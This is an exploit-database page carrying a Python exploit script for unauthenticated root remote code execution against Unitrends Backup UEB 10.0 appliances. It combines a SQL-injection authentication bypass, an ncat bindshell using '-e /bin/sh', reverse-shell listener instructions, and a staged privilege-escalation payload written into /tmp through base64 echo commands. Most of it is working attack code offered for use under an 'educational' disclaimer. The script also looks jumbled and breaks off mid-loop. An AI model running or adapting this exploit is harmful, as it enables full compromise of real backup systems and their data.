Exploits / Vulnerability Discovered : 2018-03-16 |
Type : remote |
Platform : linux
This exploit / vulnerability Unitrends ueb 10.0 root remote code execution is for educational purposes only and if it is used you will do on your own risk!
import httplib
import urllib
import ssl
import random
import sys
import base64
import string
import socket
from optparse import OptionParser
# Print some helpful words:
print """
###############################################################################
Unauthenticated root RCE for Unitrends Backup
Tested against appliance versions:
[+] 10.0.0-2.201706252204.CentOS6
[+] 10.0.0-5.201708151911.CentOS6
The Deal:
1. A sqli + low priv remote RCE vulnerability to is used to establish a low priv
remote shell from the UEB 10 host (you don't need to worry about setting up
a listener).
2. A local privesc exploit containing the desired command is uploaded to the host
using this shell, and executed.
3. The initial low priv shell is closed, and the local privesc script is deleted.
To use the exploit as written, make sure you're running a reverse
shell listener somewhere, using a command like:
$ nc -nlvp 4444
Then, just specify the ip and port of the remote listener in the
exploit command. Alternatively, modify this exploit to contain a
command of your choosing by modifying the 'cmd' argument.
###############################################################################
"""
###############################################################################
# STAGE 1: LOW PRIVE RCE!
# Bypass authentication and run a command as apache. In this case,
# we'll run a netcat bindshell on a random port...
# ncat -lvp 4444 -e /bin/sh
# NB: This is not the part of the process where we're going to run our command.
# We're establishing a reverse shell which will be used later to state a
# privilege escalation payload onto this box.
###############################################################################
# Here, a SQLi string overrides the uuid, providing auth bypass.
# We'll need to base64 encode before sending...
auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
###############################################################################
# STAGE 2: MOVE THE PRIVESC ONTO THE REMOTE BOX!
# The local root RCE exploit below will be printf'd into a file in /tmp
# NB: your command of choice has been inserted into this exploit.
###############################################################################
priv_esc_text = """
import socket
import binascii
import struct
import time
import sys
from optparse import OptionParser
parser = OptionParser(usage=usage)
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
type="int", default=1743,
help="port on which xinetd is running (default: 1743)")
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];data='';begin=time.time()
while 1:
#if you got some data, then break after wait sec
if total_data and time.time()-begin>timeout:
break
#if you got no data at all, wait a little longer
elif time.time()-begin>timeout*2:
break
try:
data=the_socket.recv(8192)
if data:
total_data.append(data)
begin=time.time()
else:
time.sleep(0.1)
except:
pass
return ''.join(total_data)
print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pe_filename = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16))
pe_filename += ".py"
print "[+] Connecting to ncat bindshell at {0}:{1}.".format(RHOST, str(apache_ncat_port))
try:
s2.connect((RHOST,apache_ncat_port))
except Exception as e:
print "[!] something's wrong with %s:%d. Exception is %s" % (address, port, e)
exit()
print "[+] Transfering privesc script to remote host..."
for line in priv_esc_text.split('\n'):
line = base64.b64encode(line+'\n')
ft_cmd = "echo " + line + " | base64 -d >> /tmp/{0}\n".format(pe_filename)